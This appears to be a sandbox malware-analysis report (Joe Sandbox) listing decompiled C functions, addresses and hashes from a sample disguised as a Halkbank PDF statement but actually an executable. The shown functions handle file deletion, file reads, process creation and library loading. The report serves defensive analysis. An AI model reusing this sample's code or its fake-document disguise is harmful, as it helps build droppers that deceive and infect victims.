                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x0040744d
                                          0x00407447
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074eb
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x0040751d
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x0040738e
                                          0x004075c3
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x004075fa
                                          0x004075fa
                                          0x00000000
                                          0x004075fa
                                          0x00407447
                                          0x004073ce
                                          0x004073cb

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                          • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                          • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                          • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 41%
                                          			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                          0x00405d2d
                                          0x00405d38
                                          0x00405d3d
                                          0x00405d6d
                                          0x00000000
                                          0x00405d6d
                                          0x00405d44
                                          0x00405d45
                                          0x00405d4f
                                          0x00405d47
                                          0x00405d47
                                          0x00405d47
                                          0x00405d57
                                          0x00405d63
                                          0x00405d67
                                          0x00405d67
                                          0x00000000
                                          0x00405d59
                                          0x00000000
                                          0x00405d5b

                                          APIs
                                            • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                            • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                          • String ID:
                                          • API String ID: 1655745494-0
                                          • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                          • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                          • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                          • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                          0x00406af1
                                          0x00406b08
                                          0x00406afc
                                          0x00406b06
                                          0x00406b06
                                          0x00406b13
                                          0x00406b1f

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                          • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CodeExitProcess
                                          • String ID:
                                          • API String ID: 2567322000-0
                                          • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                          • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                          • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                          • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x004061df
                                          0x004061ef
                                          0x004061f7
                                          0x00000000
                                          0x004061fe
                                          0x00000000
                                          0x00406200

                                          APIs
                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,esent,0040CEF0,004035F5,?,?,004034F9,esent,00004000,?,00000000,004033A3), ref: 004061EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: esent
                                          • API String ID: 2738559852-208730773
                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                          • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                          • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                          0x0040138a
                                          0x004013fa
                                          0x0040139b
                                          0x004013a0
                                          0x00000000
                                          0x00000000
                                          0x004013a2
                                          0x004013a3
                                          0x004013ad
                                          0x00000000
                                          0x00401404
                                          0x004013b0
                                          0x004013b7
                                          0x004013bd
                                          0x004013be
                                          0x004013c0
                                          0x004013c2
                                          0x004013b9
                                          0x004013b9
                                          0x004013ba
                                          0x004013ba
                                          0x004013c9
                                          0x004013cb
                                          0x004013f4
                                          0x004013f4
                                          0x004013c9
                                          0x00000000

                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                          • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                          • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                          • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                          0x00405c54
                                          0x00405c74
                                          0x00405c7c
                                          0x00405c81
                                          0x00000000
                                          0x00405c87
                                          0x00405c8b

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                          • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                          • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                          • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                          0x00406a3d
                                          0x00406a40
                                          0x00406a47
                                          0x00406a4f
                                          0x00406a5b
                                          0x00000000
                                          0x00406a62
                                          0x00406a52
                                          0x00406a59
                                          0x00000000
                                          0x00406a6a
                                          0x00000000

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                            • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                            • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                            • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                          • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                          • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                          0x0040615c
                                          0x00406169
                                          0x0040617e
                                          0x00406184

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                          0x00406138
                                          0x0040613e
                                          0x00406143
                                          0x0040614c
                                          0x0040614c
                                          0x00406155

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
